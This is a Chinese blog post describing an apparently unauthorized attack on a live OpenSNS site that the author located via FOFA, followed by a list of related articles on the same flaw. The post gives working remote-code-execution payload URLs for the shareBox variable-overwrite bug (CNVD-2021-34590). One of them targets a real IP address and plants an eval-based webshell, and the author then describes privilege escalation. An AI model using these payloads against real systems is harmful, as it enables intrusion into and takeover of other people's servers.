一次渗透测试......OpenSNS的漏洞

最新推荐文章于 2023-12-01 09:44:11 发布
最新推荐文章于 2023-12-01 09:44:11 发布
阅读量1.4k 收藏
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/giaogiao123/article/details/119546542
版权

fofa上直接找,找到某倒霉的站。
直接搜索OpenSNSv 6.2

首先开始试一试前台rce

index.php?s=weibo/share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[method]=-%3E_validationFieldItem%26id[status]=1%26id[4]=function%26id[1]=assert%26id[args]=jiang=phpinfo()%26id[0]=jiang

直接打通
在这里插入图片描述看版本号5.4,一会提权要用
然后直接上马

http://106.54.23.125/index.php?s=weibo/share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[method]=-%3E_validationFieldItem%26id[status]=1%26id[4]=function%26id[1]=assert%26id[args]=jiang=@eval($_POST[cmd])%26id[0]=jiang

找到这个目录/tmp/php-cgi-54.sock

在这里插入图片描述进行提权
在这里插入图片描述
写入连接
在这里插入图片描述
在这里插入图片描述
成功提权。
参考

https://xz.aliyun.com/t/9936

jing!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现 || OpenSNS远程命令执行漏洞
失心少年
07-12 733
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!opensns是基于tp3开发的,仅支持php5,漏洞入口在 weibo/share/sharebox,通过 get请求提交query参数,存在变量覆盖的漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令。1.执行如下POC可执行远程命令。
OpenSNS微社区 6.0.0.zip
05-27
OpenSNS微社区是一款综合性社交软件,您可以使用OpenSNS快速搭建一个类似新浪微博一样的功能强大的社交网站,您的社交网站也可以在微信中被访问,还支持苹果和安卓手机通过APP的形式使用,除此之外,OpenSNS还提供云...
Opensns 命令执行漏洞(CNVD-2021-34590)
小小猪的博客
12-29 3673
Opensns 命令执行漏洞(CNVD-2021-34590) 漏洞描述: OpenSNS 存在远程命令执行漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令 影响版本: OpenSNS v5 环境搭建: 在线环境 地址 访问首页 构造poc /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[m.
opensns v6.2.0前台RCE漏洞分析
weixin_40484719的博客
10-16 3012
最近准备进一步学习下代码审计,因此打算找些历史漏洞分析学习下。(啥时候我也能挖出前台rce呢 本次漏洞的入口点在于 Application/Weibo/Controller/ShareController.class.php的shareBox方法。 Application/Weibo/Controller/ShareController.class.php share控制器获取外部输入$query,并将它用parse_str解析后交给$array,这里其实就相当于传入了一个数组。接下...
opensns 命令执行 (CNVD-2021-34590)漏洞复现
weixin_42675091的博客
09-23 1381
opensns 命令执行 (CNVD-2021-34590)漏洞复现
opensns综合性社交软件系统存在远程命令执行高危漏洞
weixin_68647219的博客
08-01 3526
opensns综合性社交软件系统远程命令执行高危漏洞,该漏洞是由于漏洞入口在 weibo/share/sharebox通过 get请求提交query参数存在变量覆盖,可能导致攻击者通过漏洞发送特定的请求包执行任意命令。
OpenSNS 远程执行任意命令漏洞
最新发布
未花的博客
12-01 411
status必须等于1,值里必须要app、model、method
openSNS(V2版本) 用户身份切换可能产生的bug以及正规流程
F_shan的博客
07-29 953
openSNS V2版本注册用户的身份切换有一个严格的流程,不是通过这个流程切换用户身份会造成登入和提示身份未审核或禁用提示,影响体验。在此我会给出身份切换的流程:
OpenSNS开源社交系统--文件上传渗透测试复现
CNXBDSa的博客
08-19 1659
前提:在先知社区里面偶然看见了这个漏洞,咱也想试试,就下载了开源的码进行了本地的复现 源码信息:OpenSNS开源版 漏洞类型:后台getshell 下载地址:http://www.opensns.cn/home/index/download.html 漏洞文件:./Application/Admin/Controller/ThemeController.class.php 第170行 可参考这下载安装使用https://www.w3cschool.cn/opensnscourse/laxp1pnw.htm
opensns html5,记对OpenSNS一次代码审计
weixin_29289821的博客
06-28 303
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。我在FreeBuf上每天都可以学到很多新思路新技术,感谢这个平台,为了回馈FreeBuf的小伙伴们,写下这篇文章,希望在可以为奋斗在网络安全路上的小伙伴们提供一些新奇小思路,其实挖洞并不难,也希望大家能把分享的精神发扬光大。概述OpenSNS是想天科技开发的一款综合性社交软件。您可以...
基于PHP的OpenSNS轻量级社交平台php版源码.zip
08-27
6. 开发工具:开发者在使用OpenSNS源码时,可能会用到Git进行版本控制,Sublime Text、VS Code或PHPStorm等编辑器进行代码编写,以及PHPUnit等进行单元测试。 7. 安全性:OpenSNS需要考虑的安全问题包括防止SQL注入...
基于PHP的OpenSNS轻量级社交平台 php版.zip
07-22
OpenSNS作为一款社交网络软件,提供了许多核心功能,如用户注册、登录、个人资料管理、好友关系、消息系统、动态分享等。这些功能是构建社交网络的基础,使用户能够互动交流。此外,OpenSNS还具备以下特性: 1. **...
PHP实例开发源码—OpenSNS轻量级社交平台 php版.zip
11-22
OpenSNS是一款基于PHP开发的轻量级社交网络平台,专为中小企业和个人开发者设计,旨在快速构建具有互动性、分享性的社区网站。本实例源码提供了丰富的功能模块,包括用户注册、登录、个人主页、好友关系、动态发布、...
OpenSNS-2.6.0安装教程及完整PHP源码下载.txt
07-17
OpenSNS是php语言的开源社交源码系统,用户交互界面简洁大方,包含功能有微博、论坛、积分商城、群组、充值中心、分类信息、微店等,可以快速搭建社交类网址。
靶场练习——SDcms文件上传漏洞靶场
p36273的博客
09-15 1209
今次练习的是SDcms靶场,该靶场是一个文件上传漏洞系列的靶场,靶场如下: 如图所示,登录页面参数是?m=login尝试把上面URL的参数login改成admin,如下图,进入成功。 这里第一反应使用了账号密码爆破,发现对访问的IP有限制,一旦超过错误访问次数,就会被限制登录,图片如下: 使用账号密码admin/admin,成登录网站后台 找到如图所示的文件上传点 如图找到文件上传的路径:/upfile/2023/09/在Burp中把 .jpg 改成 .php,然后再文件内容中添加GIF89a头部,发现ph
测试开发必备技能:安全测试漏洞靶场实战
04-11 4179
安全在互联网行业,是一个对专业性较强,且敏感的一个领域,所谓"一念成佛,一念入魔",安全技术利用得当,可以为你的产品、网站更好的保驾护航,而如果心术不正,利用安全漏洞去做一些未法牟利,则容易造成承担不必要的违法责任。 在日常很容易被大家忽略的一点,在非授权的情况下,对网站进行渗透攻击测试,也是属于非合规操作,是触及法律法规的。因此对于大家在学习安全测试过程中,通常建议是直接在本地直接搭建安全演练靶场环境,尽量避免直接对非授权的网站进行测试。 掌握安全测试是测试开发工程师进阶的一项硬技能,今天这篇文章,就
CSRF漏洞以及靶场(史上最详细)
qq_34598847的博客
10-17 1207
产生原因:服务器端没有对用户提交的数据进行严格的把控,导致攻击者可以利用用户的Cookie信息伪造用户请求发送至服务器利用方式:攻击者诱导受害者进入第三方网站,在第三方网站中,向被攻击网站发送跨站请求。利用受害者在被攻击网站已经获取的注册凭证,绕过后台的用户验证,达到冒充用户对被攻击的网站执行某项操作的目的原理:攻击者盗用了你的身份,以你的名义发送恶意请求危害:以受害者名义发送邮件,发消息,盗取受害者的账号,甚至购买商品,虚拟货币转账,修改受害者的网络配置(比如修改路由器DNS、重置路由器密码)等等。
文件上传靶场-Nginx文件解析漏洞
ierciyuan的博客
11-04 1735
一个简单的nginx文件解析漏洞靶场。配置疏忽导致文件上传漏洞产生。
vulfocus——opensns命令执行(CNVD-2021-34590)
m0_62063669的博客
09-29 703
此处的cmd= 只能传参1个,在使用'system'函数空格会导致执行失败,故而使用php中的copy函数直接下载webshell实现RCE。OpenSNS存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。copy(远程文件下载地址,需要下载到的地方)4.也可以通过下载webshell,用工具连接。2.发送特定请求包可以执行任意命令。3.在phpinfo找到flag。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值